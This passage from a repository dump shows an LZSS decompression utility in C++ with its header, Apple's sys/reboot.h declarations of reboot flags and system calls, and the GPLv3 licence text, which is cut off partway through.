*readFrom = NULL;\n    FILE *outputDir = NULL;\n    \n#define HANDLEULOPTION(var, type) (argv[i][2] ? var= (type)strtoul(argv[i]+2, 0, 0) : i+1<argc ? 
var= (type)strtoul(argv[++i], 0, 0) : 0)\n    \n    uint32_t skipbytes=0;\n    if (argc < 2)\n    {\n        usage(argc, argv);\n        return 0;\n    }\n    for (int i=1 ; i<argc ; i++)\n    {\n        if (argv[i][0]=='-') switch(argv[i][1])\n        {\n            case 'd': g_debug++;\n                if (argv[i][2]=='d')\n                    g_debug++;\n                break;\n            case 'o': HANDLEULOPTION(skipbytes, uint32_t); break;\n            default:\n                usage(argc, argv);\n                return 1;\n        }\n        else if (argv[i][0]=='/') {\n            if (readFrom) {\n                printf(\"[lzss] Opening %s for writing\\n\", argv[i]);\n                outputDir = fopen(argv[i], \"w+b\");\n            }\n            else {\n                printf(\"[lzss] Opening %s for reading\\n\", argv[i]);\n                readFrom = fopen(argv[i], \"rb\");\n            }\n        }\n        else {\n            usage(argc, argv);\n            return 1;\n        }\n    }\n#define CHUNK 0x10000\n    \n    lzssdecompress lzss;\n    uint8_t *ibuf= (uint8_t*)malloc(CHUNK);\n    uint8_t *obuf= (uint8_t*)malloc(CHUNK);\n    \n    // skip first <skipbytes> bytes\n    while (skipbytes && !feof(readFrom)) {\n        int nr= fread(ibuf, 1, std::min(skipbytes,(uint32_t)CHUNK), readFrom);\n        skipbytes -= nr;\n    }\n    \n    while (!feof(readFrom))\n    {\n        size_t nr= fread(ibuf, 1, CHUNK, readFrom);\n        if (nr==0) {\n            perror(\"read\");\n            return 1;\n        }\n        if (nr==0)\n            break;\n        \n        size_t srcp= 0;\n        while (srcp<nr) {\n            uint32_t dstused;\n            uint32_t srcused;\n            lzss.decompress(obuf, CHUNK, &dstused, ibuf+srcp, nr-srcp, &srcused);\n            srcp+=srcused;\n            size_t nw= fwrite(obuf, 1, dstused, outputDir);\n            if (nw<dstused) {\n                perror(\"write\");\n                return 1;\n            }\n            if 
(g_debug) fprintf(stderr, \"decompress: 0x%x -> 0x%x\\n\", srcused, dstused);\n        }\n    }\n    if (g_debug) fprintf(stderr, \"done reading\\n\");\n    uint32_t dstused;\n    lzss.flush(obuf, CHUNK, &dstused);\n    size_t nw= fwrite(obuf, 1, dstused, outputDir);\n    if (nw<dstused) {\n        perror(\"write\");\n        return 1;\n    }\n    \n    if (g_debug) fprintf(stderr, \"flush: %d bytes\\n\", dstused);\n    \n    free(ibuf);\n    free(obuf);\n    \n    return 0;\n}\n"
  },
  {
    "path": "Kernel Utilities/lzssdec.hpp",
    "content": "//\n//  lzssdec.hpp\n//  KernelSymbolFinder\n//\n//  Created by Jake James on 8/21/18.\n//  Copyright © 2018 Jake James. All rights reserved.\n//\n\n#ifndef lzssdec_hpp\n#define lzssdec_hpp\n\n#include <stdio.h>\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n     int lzssdec(int argc,char**argv);\n#ifdef __cplusplus\n}\n\n#endif\n\n\n#endif /* lzssdec_hpp */\n"
  },
  {
    "path": "Kernel Utilities/system_reboot.h",
    "content": "/*\n * Copyright (c) 2000-2006 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n * \n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/* Copyright (c) 1995 NeXT Computer, Inc. All Rights Reserved */\n/*\n * Copyright (c) 1982, 1986, 1988, 1993, 1994\n *\tThe Regents of the University of California.  All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n *    notice, this list of conditions and the following disclaimer.\n * 2. 
Redistributions in binary form must reproduce the above copyright\n *    notice, this list of conditions and the following disclaimer in the\n *    documentation and/or other materials provided with the distribution.\n * 3. All advertising materials mentioning features or use of this software\n *    must display the following acknowledgement:\n *\tThis product includes software developed by the University of\n *\tCalifornia, Berkeley and its contributors.\n * 4. Neither the name of the University nor the names of its contributors\n *    may be used to endorse or promote products derived from this software\n *    without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n * SUCH DAMAGE.\n *\n *\t@(#)reboot.h\t8.3 (Berkeley) 12/13/94\n */\n\n#ifndef\t_SYS_REBOOT_H_\n#define _SYS_REBOOT_H_\n\n#include <sys/appleapiopts.h>\n#include <sys/cdefs.h>\n#include <stdint.h>\n\n/*\n * Arguments to reboot system call.\n */\n\n#ifdef __APPLE_API_PRIVATE\n#define RB_AUTOBOOT\t0\t/* flags for system auto-booting itself */\n\n#define RB_ASKNAME\t0x01\t/* ask for file name to reboot from */\n#define RB_SINGLE\t0x02\t/* reboot to single user only */\n#define RB_NOSYNC\t0x04\t/* dont sync before reboot */\n#define RB_HALT\t\t0x08\t/* don't 
reboot, just halt */\n#define RB_INITNAME\t0x10\t/* name given for /etc/init */\n#define RB_DFLTROOT\t0x20\t/* use compiled-in rootdev */\n#define RB_ALTBOOT\t0x40\t/* use /boot.old vs /boot */\n#define RB_UNIPROC\t0x80\t/* don't start slaves */\n#define RB_SAFEBOOT\t0x100\t/* booting safe */\n#define RB_UPSDELAY 0x200   /* Delays restart by 5 minutes */\n#define RB_QUICK\t0x400\t/* quick and ungraceful reboot with file system caches flushed*/\n#define RB_PANIC\t0x800   /* panic the kernel */\n\n__BEGIN_DECLS\n/* userspace reboot control */\nint usrctl(uint32_t flags);\n/* The normal reboot syscall. */\nint reboot(int howto);\n/* Used with RB_PANIC to panic the kernel from userspace with a message.\n * Requires an entitlement on Release. */\nint reboot_np(int howto, const char *message);\n__END_DECLS\n\n#endif /* __APPLE_API_PRIVATE */\n\n#ifdef __APPLE_API_OBSOLETE\n/*\n * Constants for converting boot-style device number to type,\n * adaptor (uba, mba, etc), unit number and partition number.\n * Type (== major device number) is in the low byte\n * for backward compatibility.  
Except for that of the \"magic\n * number\", each mask applies to the shifted value.\n * Format:\n *\t (4) (4) (4) (4)  (8)     (8)\n *\t--------------------------------\n *\t|MA | AD| CT| UN| PART  | TYPE |\n *\t--------------------------------\n */\n#define B_ADAPTORSHIFT\t24\n#define B_ADAPTORMASK\t0x0f\n#define\tB_ADAPTOR(val)\t\t(((val) >> B_ADAPTORSHIFT) & B_ADAPTORMASK)\n#define B_CONTROLLERSHIFT\t20\n#define B_CONTROLLERMASK\t0xf\n#define\tB_CONTROLLER(val)\t(((val)>>B_CONTROLLERSHIFT) & B_CONTROLLERMASK)\n#define B_UNITSHIFT\t16\n#define B_UNITMASK\t0xff\n#define\tB_UNIT(val)\t\t(((val) >> B_UNITSHIFT) & B_UNITMASK)\n#define B_PARTITIONSHIFT 8\n#define B_PARTITIONMASK\t0xff\n#define\tB_PARTITION(val)\t(((val) >> B_PARTITIONSHIFT) & B_PARTITIONMASK)\n#define B_TYPESHIFT\t0\n#define B_TYPEMASK\t0xff\n#define\tB_TYPE(val)\t\t(((val) >> B_TYPESHIFT) & B_TYPEMASK)\n#define B_MAGICMASK\t0xf0000000\n#define B_DEVMAGIC\t0xa0000000\n\n#define MAKEBOOTDEV(type, adaptor, controller, unit, partition) \\\n\t(((type) << B_TYPESHIFT) | ((adaptor) << B_ADAPTORSHIFT) | \\\n\t((controller) << B_CONTROLLERSHIFT) | ((unit) << B_UNITSHIFT) | \\\n\t((partition) << B_PARTITIONSHIFT) | B_DEVMAGIC)\n\n#endif /* __APPLE_API_OBSOLETE */\n\n\n\n#endif\t/* _SYS_REBOOT_H_ */\n"
  },
  {
    "path": "LICENSE",
    "content": "                    GNU GENERAL PUBLIC LICENSE\n                       Version 3, 29 June 2007\n\n Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>\n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n                            Preamble\n\n  The GNU General Public License is a free, copyleft license for\nsoftware and other kinds of works.\n\n  The licenses for most software and other practical works are designed\nto take away your freedom to share and change the works.  By contrast,\nthe GNU General Public License is intended to guarantee your freedom to\nshare and change all versions of a program--to make sure it remains free\nsoftware for all its users.  We, the Free Software Foundation, use the\nGNU General Public License for most of our software; it applies also to\nany other work released this way by its authors.  You can apply it to\nyour programs, too.\n\n  When we speak of free software, we are referring to freedom, not\nprice.  Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthem if you wish), that you receive source code or can get it if you\nwant it, that you can change the software or use pieces of it in new\nfree programs, and that you know you can do these things.\n\n  To protect your rights, we need to prevent others from denying you\nthese rights or asking you to surrender the rights.  Therefore, you have\ncertain responsibilities if you distribute copies of the software, or if\nyou modify it: responsibilities to respect the freedom of others.\n\n  For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must pass on to the recipients the same\nfreedoms that you received.  You must make sure that they, too, receive\nor can get the source code.  
And you must show them these terms so they\nknow their rights.\n\n  Developers that use the GNU GPL protect your rights with two steps:\n(1) assert copyright on the software, and (2) offer you this License\ngiving you legal permission to copy, distribute and/or modify it.\n\n  For the developers' and authors' protection, the GPL clearly explains\nthat there is no warranty for this free software.  For both users' and\nauthors' sake, the GPL requires that modified versions be marked as\nchanged, so that their problems will not be attributed erroneously to\nauthors of previous versions.\n\n  Some devices are designed to deny users access to install or run\nmodified versions of the software inside them, although the manufacturer\ncan do so.  This is fundamentally incompatible with the aim of\nprotecting users' freedom to change the software.  The systematic\npattern of such abuse occurs in the area of products for individuals to\nuse, which is precisely where it is most unacceptable.  Therefore, we\nhave designed this version of the GPL to prohibit the practice for those\nproducts.  If such problems arise substantially in other domains, we\nstand ready to extend this provision to those domains in future versions\nof the GPL, as needed to protect the freedom of users.\n\n  Finally, every program is threatened constantly by software patents.\nStates should not allow patents to restrict development and use of\nsoftware on general-purpose computers, but in those that do, we wish to\navoid the special danger that patents applied to a free program could\nmake it effectively proprietary.  To prevent this, the GPL assures that\npatents cannot be used to render the program non-free.\n\n  The precise terms and conditions for copying, distribution and\nmodification follow.\n\n                       TERMS AND CONDITIONS\n\n  0. 
Definitions.\n\n  \"This License\" refers to version 3 of the GNU General Public License.\n\n  \"Copyright\" also means copyright-like laws that apply to other kinds of\nworks, such as semiconductor masks.\n\n  \"The Program\" refers to any copyrightable work licensed under this\nLicense.  Each licensee is addressed as \"you\".  \"Licensees\" and\n\"recipients\" may be individuals or organizations.\n\n  To \"modify\" a work means to copy from or adapt all or part of the work\nin a fashion requiring copyright permission, other than the making of an\nexact copy.  The resulting work is called a \"modified version\" of the\nearlier work or a work \"based on\" the earlier work.\n\n  A \"covered work\" means either the unmodified Program or a work based\non the Program.\n\n  To \"propagate\" a work means to do anything with it that, without\npermission, would make you directly or secondarily liable for\ninfringement under applicable copyright law, except executing it on a\ncomputer or modifying a private copy.  Propagation includes copying,\ndistribution (with or without modification), making available to the\npublic, and in some countries other activities as well.\n\n  To \"convey\" a work means any kind of propagation that enables other\nparties to make or receive copies.  Mere interaction with a user through\na computer network, with no transfer of a copy, is not conveying.\n\n  An interactive user interface displays \"Appropriate Legal Notices\"\nto the extent that it includes a convenient and prominently visible\nfeature that (1) displays an appropriate copyright notice, and (2)\ntells the user that there is no warranty for the work (except to the\nextent that warranties are provided), that licensees may convey the\nwork under this License, and how to view a copy of this License.  If\nthe interface presents a list of user commands or options, such as a\nmenu, a prominent item in the list meets this criterion.\n\n  1. 
Source Code.\n\n  The \"source code\" for a work means the preferred form of the work\nfor making modifications to it.  \"Object code\" means any non-source\nform of a work.\n\n  A \"Standard Interface\" means an interface that either is an official\nstandard defined by a recognized standards body, or, in the case of\ninterfaces specified for a particular programming language, one that\nis widely used among developers working in that language.\n\n  The \"System Libraries\" of an executable work include anything, other\nthan the work as a whole, that (a) is included in the normal form of\npackaging a Major Component, but which is not part of that Major\nComponent, and (b) serves only to enable use of the work with that\nMajor Component, or to implement a Standard Interface for which an\nimplementation is available to the public in source code form.  A\n\"Major Component\", in this context, means a major essential component\n(kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to\nproduce the work, or an object code interpreter used to run it.\n\n  The \"Corresponding Source\" for a work in object code form means all\nthe source code needed to generate, install, and (for an executable\nwork) run the object code and to modify the work, including scripts to\ncontrol those activities.  However, it does not include the work's\nSystem Libraries, or general-purpose tools or generally available free\nprograms which are used unmodified in performing those activities but\nwhich are not part of the work.  
For example, Corresponding Source\nincludes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically\nlinked subprograms that the work is specifically designed to require,\nsuch as by intimate data communication or control flow between those\nsubprograms and other parts of the work.\n\n  The Corresponding Source need not include anything that users\ncan regenerate automatically from other parts of the Corresponding\nSource.\n\n  The Corresponding Source for a work in source code form is that\nsame work.\n\n  2. Basic Permissions.\n\n  All rights granted under this License are granted for the term of\ncopyright on the Program, and are irrevocable provided the stated\nconditions are met.  This License explicitly affirms your unlimited\npermission to run the unmodified Program.  The output from running a\ncovered work is covered by this License only if the output, given its\ncontent, constitutes a covered work.  This License acknowledges your\nrights of fair use or other equivalent, as provided by copyright law.\n\n  You may make, run and propagate covered works that you do not\nconvey, without conditions so long as your license otherwise remains\nin force.  You may convey covered works to others for the sole purpose\nof having them make modifications exclusively for you, or provide you\nwith facilities for running those works, provided that you comply with\nthe terms of this License in conveying all material for which you do\nnot control copyright.  Those thus making or running the covered works\nfor you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of\nyour copyrighted material outside their relationship with you.\n\n  Conveying under any other circumstances is permitted solely under\nthe conditions stated below.  Sublicensing is not allowed; section 10\nmakes it unnecessary.\n\n  3. 
Protecting Users' Legal Rights From Anti-Circumvention Law.\n\n  No covered work shall be deemed part of an effective technological\nmeasure under any applicable law fulfilling obligations under article\n11 of the WIPO copyright treaty adopted on 20 December 1996, or\nsimilar laws prohibiting or restricting circumvention of such\nmeasures.\n\n  When you convey a covered work, you waive any legal power to forbid\ncircumvention of technological measures to the extent such circumvention\nis effected by exercising rights under this License with respect to\nthe covered work, and you disclaim any intention to limit operation or\nmodification of the work as a means of enforcing, against the work's\nusers, your or third parties' legal rights to forbid circumvention of\ntechnological measures.\n\n  4. Conveying Verbatim Copies.\n\n  You may convey verbatim copies of the Program's source code as you\nreceive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice;\nkeep intact all notices stating that this License and any\nnon-permissive terms added in accord with section 7 apply to the code;\nkeep intact all notices of the absence of any warranty; and give all\nrecipients a copy of this License along with the Program.\n\n  You may charge any price or no price for each copy that you convey,\nand you may offer support or warranty protection for a fee.\n\n  5. Conveying Modified Source Versions.\n\n  You may convey a work based on the Program, or the modifications to\nproduce it from the Program, in the form of source code under the\nterms of section 4, provided that you also meet all of these conditions:\n\n    a) The work must carry prominent notices stating that you modified\n    it, and giving a relevant date.\n\n    b) The work must carry prominent notices stating that it is\n    released under this License and any conditions added under section\n    7.  
This requirement modifies the requirement in section 4 to\n    \"keep intact all notices\".\n\n    c) You must license the entire work, as a whole, under this\n    License to anyone who comes into possession of a copy.  This\n    License will therefore apply, along with any applicable section 7\n    additional terms, to the whole of the work, and all its parts,\n    regardless of how they are packaged.  This License gives no\n    permission to license the work in any other way, but it does not\n    invalidate such permission if you have separately received it.\n\n    d) If the work has interactive user interfaces, each must display\n    Appropriate Legal Notices; however, if the Program has interactive\n    interfaces that do not display Appropriate Legal Notices, your\n    work need not make them do so.\n\n  A compilation of a covered work with other separate and independent\nworks, which are not by their nature extensions of the covered work,\nand which are not combined with it such as to form a larger program,\nin or on a volume of a storage or distribution medium, is called an\n\"aggregate\" if the compilation and its resulting copyright are not\nused to limit the access or legal rights of the compilation's users\nbeyond what the individual works permit.  Inclusion of a covered work\nin an aggregate does not cause this License to apply to the other\nparts of the aggregate.\n\n  6. 
Conveying Non-Source Forms.\n\n  You may convey a covered work in object code form under the terms\nof sections 4 and 5, provided that you also convey the\nmachine-readable Corresponding Source under the terms of this License,\nin one of these ways:\n\n    a) Convey the object code in, or embodied in, a physical product\n    (including a physical distribution medium), accompanied by the\n    Corresponding Source fixed on a durable physical medium\n    customarily used for software interchange.\n\n    b) Convey the object code in, or embodied in, a physical product\n    (including a physical distribution medium), accompanied by a\n    written offer, valid for at least three years and valid for as\n    long as you offer spare parts or customer support for that product\n    model, to give anyone who possesses the object code either (1) a\n    copy of the Corresponding Source for all the software in the\n    product that is covered by this License, on a durable physical\n    medium customarily used for software interchange, for a price no\n    more than your reasonable cost of physically performing this\n    conveying of source, or (2) access to copy the\n    Corresponding Source from a network server at no charge.\n\n    c) Convey individual copies of the object code with a copy of the\n    written offer to provide the Corresponding Source.  This\n    alternative is allowed only occasionally and noncommercially, and\n    only if you received the object code with such an offer, in accord\n    with subsection 6b.\n\n    d) Convey the object code by offering access from a designated\n    place (gratis or for a charge), and offer equivalent access to the\n    Corresponding Source in the same way through the same place at no\n    further charge.  You need not require recipients to copy the\n    Corresponding Source along with the object code.  
If the place to\n    copy the object code is a network server, the Corresponding Source\n    may be on a different server (operated by you or a third party)\n    that supports equivalent copying facilities, provided you maintain\n    clear directions next to the object code saying where to find the\n    Corresponding Source.  Regardless of what server hosts the\n    Corresponding Source, you remain obligated to ensure that it is\n    available for as long as needed to satisfy these requirements.\n\n    e) Convey the object code using peer-to-peer transmission, provided\n    you inform other peers where the object code and Corresponding\n    Source of the work are being offered to the general public at no\n    charge under subsection 6d.\n\n  A separable portion of the object code, whose source code is excluded\nfrom the Corresponding Source as a System Library, need not be\nincluded in conveying the object code work.\n\n  A \"User Product\" is either (1) a \"consumer product\", which means any\ntangible personal property which is normally used for personal, family,\nor household purposes, or (2) anything designed or sold for incorporation\ninto a dwelling.  In determining whether a product is a consumer product,\ndoubtful cases shall be resolved in favor of coverage.  For a particular\nproduct received by a particular user, \"normally used\" refers to a\ntypical or common use of that class of product, regardless of the status\nof the particular user or of the way in which the particular user\nactually uses, or expects or is expected to use, the product.  
A product\nis a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent\nthe only significant mode of use of the product.\n\n  \"Installation Information\" for a User Product means any methods,\nprocedures, authorization keys, or other information required to install\nand execute modified versions of a covered work in that User Product from\na modified version of its Corresponding Source.  The information must\nsuffice to ensure that the continued functioning of the modified object\ncode is in no case prevented or interfered with solely because\nmodification has been made.\n\n  If you convey an object code work under this section in, or with, or\nspecifically for use in, a User Product, and the conveying occurs as\npart of a transaction in which the right of possession and use of the\nUser Product is transferred to the recipient in perpetuity or for a\nfixed term (regardless of how the transaction is characterized), the\nCorresponding Source conveyed under this section must be accompanied\nby the Installation Information.  But this requirement does not apply\nif neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has\nbeen installed in ROM).\n\n  The requirement to provide Installation Information does not include a\nrequirement to continue to provide support service, warranty, or updates\nfor a work that has been modified or installed by the recipient, or for\nthe User Product in which it has been modified or installed.  
Access to a\nnetwork may be denied when the modification itself materially and\nadversely affects the operation of the network or violates the rules and\nprotocols for communication across the network.\n\n  Corresponding Source conveyed, and Installation Information provided,\nin accord with this section must be in a format that is publicly\ndocumented (and with an implementation available to the public in\nsource code form), and must require no special password or key for\nunpacking, reading or copying.\n\n  7. Additional Terms.\n\n  \"Additional permissions\" are terms that supplement the terms of this\nLicense by making exceptions from one or more of its conditions.\nAdditional permissions that are applicable to the entire Program shall\nbe treated as though they were included in this License, to the extent\nthat they are valid under applicable law.  If additional permissions\napply only to part of the Program, that part may be used separately\nunder those permissions, but the entire Program remains governed by\nthis License without regard to the additional permissions.\n\n  When you convey a copy of a covered work, you may at your option\nremove any additional permissions from that copy, or from any part of\nit.  (Additional permissions may be written to require their own\nremoval in certain cases when you modify the work.)  
You may place\nadditional permissions on material, added by you to a covered work,\nfor which you have or can give appropriate copyright permission.\n\n  Notwithstanding any other provision of this License, for material you\nadd to a covered work, you may (if authorized by the copyright holders of\nthat material) supplement the terms of this License with terms:\n\n    a) Disclaiming warranty or limiting liability differently from the\n    terms of sections 15 and 16 of this License; or\n\n    b) Requiring preservation of specified reasonable legal notices or\n    author attributions in that material or in the Appropriate Legal\n    Notices displayed by works containing it; or\n\n    c) Prohibiting misrepresentation of the origin of that material, or\n    requiring that modified versions of such material be marked in\n    reasonable ways as different from the original version; or\n\n    d) Limiting the use for publicity purposes of names of licensors or\n    authors of the material; or\n\n    e) Declining to grant rights under trademark law for use of some\n    trade names, trademarks, or service marks; or\n\n    f) Requiring indemnification of licensors and authors of that\n    material by anyone who conveys the material (or modified versions of\n    it) with contractual assumptions of liability to the recipient, for\n    any liability that these contractual assumptions directly impose on\n    those licensors and authors.\n\n  All other non-permissive additional terms are considered \"further\nrestrictions\" within the meaning of section 10.  If the Program as you\nreceived it, or any part of it, contains a notice stating that it is\ngoverned by this License along with a term that is a further\nrestriction, you may remove that term.  
If a license document contains\na further restriction but permits relicensing or conveying under this\nLicense, you may add to a covered work material governed by the terms\nof that license document, provided that the further restriction does\nnot survive such relicensing or conveying.\n\n  If you add terms to a covered work in accord with this section, you\nmust place, in the relevant source files, a statement of the\nadditional terms that apply to those files, or a notice indicating\nwhere to find the applicable terms.\n\n  Additional terms, permissive or non-permissive, may be stated in the\nform of a separately written license, or stated as exceptions;\nthe above requirements apply either way.\n\n  8. Termination.\n\n  You may not propagate or modify a covered work except as expressly\nprovided under this License.  Any attempt otherwise to propagate or\nmodify it is void, and will automatically terminate your rights under\nthis License (including any patent licenses granted under the third\nparagraph of section 11).\n\n  However, if you cease all violation of this License, then your\nlicense from a particular copyright holder is reinstated (a)\nprovisionally, unless and until the copyright holder explicitly and\nfinally terminates your license, and (b) permanently, if the copyright\nholder fails to notify you of the violation by some reasonable means\nprior to 60 days after the cessation.\n\n  Moreover, your license from a particular copyright holder is\nreinstated permanently if the copyright holder notifies you of the\nviolation by some reasonable means, this is the first time you have\nreceived notice of violation of this License (for any work) from that\ncopyright holder, and you cure the violation prior to 30 days after\nyour receipt of the notice.\n\n  Termination of your rights under this section does not terminate the\nlicenses of parties who have received copies or rights from you under\nthis License.  
If your rights have been terminated and not permanently\nreinstated, you do not qualify to receive new licenses for the same\nmaterial under section 10.\n\n  9. Acceptance Not Required for Having Copies.\n\n  You are not required to accept this License in order to receive or\nrun a copy of the Program.  Ancillary propagation of a covered work\noccurring solely as a consequence of using peer-to-peer transmission\nto receive a copy likewise does not require acceptance.  However,\nnothing other than this License grants you permission to propagate or\nmodify any covered work.  These actions infringe copyright if you do\nnot accept this License.  Therefore, by modifying or propagating a\ncovered work, you indicate your acceptance of this License to do so.\n\n  10. Automatic Licensing of Downstream Recipients.\n\n  Each time you convey a covered work, the recipient automatically\nreceives a license from the original licensors, to run, modify and\npropagate that work, subject to this License.  You are not responsible\nfor enforcing compliance by third parties with this License.\n\n  An \"entity transaction\" is a transaction transferring control of an\norganization, or substantially all assets of one, or subdividing an\norganization, or merging organizations.  If propagation of a covered\nwork results from an entity transaction, each party to that\ntransaction who receives a copy of the work also receives whatever\nlicenses to the work the party's predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the\nCorresponding Source of the work from the predecessor in interest, if\nthe predecessor has it or can get it with reasonable efforts.\n\n  You may not impose any further restrictions on the exercise of the\nrights granted or affirmed under this License.  
For example, you may\nnot impose a license fee, royalty, or other charge for exercise of\nrights granted under this License, and you may not initiate litigation\n(including a cross-claim or counterclaim in a lawsuit) alleging that\nany patent claim is infringed by making, using, selling, offering for\nsale, or importing the Program or any portion of it.\n\n  11. Patents.\n\n  A \"contributor\" is a copyright holder who authorizes use under this\nLicense of the Program or a work on which the Program is based.  The\nwork thus licensed is called the contributor's \"contributor version\".\n\n  A contributor's \"essential patent claims\" are all patent claims\nowned or controlled by the contributor, whether already acquired or\nhereafter acquired, that would be infringed by some manner, permitted\nby this License, of making, using, or selling its contributor version,\nbut do not include claims that would be infringed only as a\nconsequence of further modification of the contributor version.  For\npurposes of this definition, \"control\" includes the right to grant\npatent sublicenses in a manner consistent with the requirements of\nthis License.\n\n  Each contributor grants you a non-exclusive, worldwide, royalty-free\npatent license under the contributor's essential patent claims, to\nmake, use, sell, offer for sale, import and otherwise run, modify and\npropagate the contents of its contributor version.\n\n  In the following three paragraphs, a \"patent license\" is any express\nagreement or commitment, however denominated, not to enforce a patent\n(such as an express permission to practice a patent or covenant not to\nsue for patent infringement).  
To \"grant\" such a patent license to a\nparty means to make such an agreement or commitment not to enforce a\npatent against the party.\n\n  If you convey a covered work, knowingly relying on a patent license,\nand the Corresponding Source of the work is not available for anyone\nto copy, free of charge and under the terms of this License, through a\npublicly available network server or other readily accessible means,\nthen you must either (1) cause the Corresponding Source to be so\navailable, or (2) arrange to deprive yourself of the benefit of the\npatent license for this particular work, or (3) arrange, in a manner\nconsistent with the requirements of this License, to extend the patent\nlicense to downstream recipients.  \"Knowingly relying\" means you have\nactual knowledge that, but for the patent license, your conveying the\ncovered work in a country, or your recipient's use of the covered work\nin a country, would infringe one or more identifiable patents in that\ncountry that you have reason to believe are valid.\n\n  If, pursuant to or in connection with a single transaction or\narrangement, you convey, or propagate by procuring conveyance of, a\ncovered work, and grant a patent license to some of the parties\nreceiving the covered work authorizing them to use, propagate, modify\nor convey a specific copy of the covered work, then the patent license\nyou grant is automatically extended to all recipients of the covered\nwork and works based on it.\n\n  A patent license is \"discriminatory\" if it does not include within\nthe scope of its coverage, prohibits the exercise of, or is\nconditioned on the non-exercise of one or more of the rights that are\nspecifically granted under this License.  
You may not convey a covered\nwork if you are a party to an arrangement with a third party that is\nin the business of distributing software, under which you make payment\nto the third party based on the extent of your activity of conveying\nthe work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory\npatent license (a) in connection with copies of the covered work\nconveyed by you (or copies made from those copies), or (b) primarily\nfor and in connection with specific products or compilations that\ncontain the covered work, unless you entered into that arrangement,\nor that patent license was granted, prior to 28 March 2007.\n\n  Nothing in this License shall be construed as excluding or limiting\nany implied license or other defenses to infringement that may\notherwise be available to you under applicable patent law.\n\n  12. No Surrender of Others' Freedom.\n\n  If conditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License.  If you cannot convey a\ncovered work so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you may\nnot convey it at all.  For example, if you agree to terms that obligate you\nto collect a royalty for further conveying from those to whom you convey\nthe Program, the only way you could satisfy both those terms and this\nLicense would be to refrain entirely from conveying the Program.\n\n  13. Use with the GNU Affero General Public License.\n\n  Notwithstanding any other provision of this License, you have\npermission to link or combine any covered work with a work licensed\nunder version 3 of the GNU Affero General Public License into a single\ncombined work, and to convey the resulting work.  
The terms of this\nLicense will continue to apply to the part which is the covered work,\nbut the special requirements of the GNU Affero General Public License,\nsection 13, concerning interaction through a network will apply to the\ncombination as such.\n\n  14. Revised Versions of this License.\n\n  The Free Software Foundation may publish revised and/or new versions of\nthe GNU General Public License from time to time.  Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\n  Each version is given a distinguishing version number.  If the\nProgram specifies that a certain numbered version of the GNU General\nPublic License \"or any later version\" applies to it, you have the\noption of following the terms and conditions either of that numbered\nversion or of any later version published by the Free Software\nFoundation.  If the Program does not specify a version number of the\nGNU General Public License, you may choose any version ever published\nby the Free Software Foundation.\n\n  If the Program specifies that a proxy can decide which future\nversions of the GNU General Public License can be used, that proxy's\npublic statement of acceptance of a version permanently authorizes you\nto choose that version for the Program.\n\n  Later license versions may give you additional or different\npermissions.  However, no additional obligations are imposed on any\nauthor or copyright holder as a result of your choosing to follow a\nlater version.\n\n  15. Disclaimer of Warranty.\n\n  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT 